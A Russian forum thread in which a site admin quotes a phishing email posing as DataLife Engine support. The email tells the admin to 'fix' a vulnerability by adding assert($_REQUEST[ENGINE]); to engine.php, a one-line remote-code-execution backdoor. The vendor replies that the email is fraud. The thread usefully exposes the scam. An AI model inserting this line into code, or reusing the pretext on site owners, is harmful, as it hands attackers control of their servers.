Письмо

[Yarka 0]

Всем добра!

Вот такой письмо пришло. Что это?

Здравствуйте, уважаемый клиент!

Благодарим Вас за использование на Вашем сайте download-program.org нашего ПО «CMS DataLife Engine - Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: download-program.org/engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_REQUEST[ENGINE]);

С уважением,

Служба поддержки «DataLife Engine»

[celsoft 5 995]

Смотрите соседние темы, уже десятки таких тем есть на форуме.

Это мошенники. Это письмо пришло не от нас и не от нашего домена. А просто было отправлено вам с вашего же сайта через обратную связь.

Все патчи публикуются только на странице http://dle-news.ru/bags/ и ставить нужно патчи только с официального сайта. А это распространение вируса.

[NtX 10]

Для этих тем походу уже надо отдельную ветку на форуме создавать.

Честно сказать, я не предполагал, что будет такое кол-во людей которые будут недоумевать по поводу такого рода сообщений. И это люди, которые, по идее, знают что такое php и работают с sql. Чего ж уж говорить тогда про простых пользователей тогда )))